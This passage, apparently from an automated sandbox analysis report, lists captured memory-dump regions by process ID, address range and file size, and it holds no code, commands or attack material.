                                                                                                                                                          • memory/964-86-0x00007FFB442D0000-0x00007FFB4438E000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            760KB

                                                                                                                                                          • memory/964-57-0x00007FFB457B0000-0x00007FFB459A5000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            2.0MB

                                                                                                                                                          • memory/964-58-0x00007FFB442D0000-0x00007FFB4438E000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            760KB

                                                                                                                                                          • memory/964-59-0x000001DA1C520000-0x000001DA1CAA6000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            5.5MB

                                                                                                                                                          • memory/964-60-0x000001DA24B80000-0x000001DA2534A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            7.8MB

                                                                                                                                                          • memory/964-61-0x000001DA25350000-0x000001DA2578E000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            4.2MB

                                                                                                                                                          • memory/964-62-0x000001DA25790000-0x000001DA25842000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            712KB

                                                                                                                                                          • memory/964-63-0x00007FFB457B0000-0x00007FFB459A5000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            2.0MB

                                                                                                                                                          • memory/964-71-0x000001DA1D470000-0x000001DA1D4C0000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            320KB

                                                                                                                                                          • memory/964-87-0x000001DA1D500000-0x000001DA1D536000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            216KB

                                                                                                                                                          • memory/964-73-0x000001DA1D810000-0x000001DA1D9D2000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            1.8MB

                                                                                                                                                          • memory/964-85-0x00007FFB457B0000-0x00007FFB459A5000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            2.0MB

                                                                                                                                                          • memory/964-84-0x000001DA1D420000-0x000001DA1D46E000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            312KB

                                                                                                                                                          • memory/1008-106-0x00000144E8440000-0x00000144E8467000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            156KB

                                                                                                                                                          • memory/1008-119-0x00007FFB05830000-0x00007FFB05840000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/2000-99-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            160KB

                                                                                                                                                          • memory/2000-88-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            160KB

                                                                                                                                                          • memory/2000-89-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            160KB

                                                                                                                                                          • memory/2000-90-0x00007FFB457B0000-0x00007FFB459A5000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            2.0MB

                                                                                                                                                          • memory/2000-91-0x00007FFB442D0000-0x00007FFB4438E000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            760KB

                                                                                                                                                          • memory/3004-379-0x00007FFB254B0000-0x00007FFB25F71000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            10.8MB

                                                                                                                                                          • memory/3004-380-0x00007FFB254B3000-0x00007FFB254B5000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            8KB

                                                                                                                                                          • memory/3004-4-0x00007FFB254B3000-0x00007FFB254B5000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            8KB

                                                                                                                                                          • memory/3004-15-0x00007FFB254B0000-0x00007FFB25F71000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            10.8MB

                                                                                                                                                          • memory/3004-14-0x00000216DD8D0000-0x00000216DD8F2000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            136KB

                                                                                                                                                          • memory/3004-16-0x00007FFB254B0000-0x00007FFB25F71000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            10.8MB

                                                                                                                                                          • memory/3004-17-0x0000021680000000-0x0000021680024000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            144KB

                                                                                                                                                          • memory/3004-26-0x00007FFB457B0000-0x00007FFB459A5000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            2.0MB

                                                                                                                                                          • memory/3004-28-0x0000021681200000-0x000002168120A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            40KB

                                                                                                                                                          • memory/3004-25-0x0000021680F20000-0x0000021680F42000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            136KB

                                                                                                                                                          • memory/3004-24-0x0000021680EC0000-0x0000021680F18000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            352KB

                                                                                                                                                          • memory/3004-19-0x00007FFB442D0000-0x00007FFB4438E000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            760KB

                                                                                                                                                          • memory/3004-1500-0x00007FFB254B0000-0x00007FFB25F71000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            10.8MB

                                                                                                                                                          • memory/3004-1499-0x00007FFB34D53000-0x00007FFB34D54000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/3004-23-0x0000021680E60000-0x0000021680EB6000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            344KB

                                                                                                                                                          • memory/3004-22-0x0000021680DB0000-0x0000021680E56000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            664KB

                                                                                                                                                          • memory/3004-20-0x0000021680360000-0x0000021680DB0000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            10.3MB

                                                                                                                                                          • memory/3004-18-0x00007FFB457B0000-0x00007FFB459A5000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            2.0MB

                                                                                                                                                          • memory/3460-29-0x0000000140000000-0x0000000140004000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            16KB

                                                                                                                                                          • memory/3460-31-0x0000000140000000-0x0000000140004000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            16KB

                                                                                                                                                          • memory/4744-93-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            128KB

                                                                                                                                                          • memory/4744-92-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            128KB

                                                                                                                                                          • memory/4744-97-0x00000000034E0000-0x00000000034FA000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            104KB

                                                                                                                                                          • memory/4744-95-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            128KB

                                                                                                                                                          • memory/5104-32-0x0000000000400000-0x0000000000406000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            24KB

                                                                                                                                                          • memory/5104-34-0x0000000000400000-0x0000000000406000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            24KB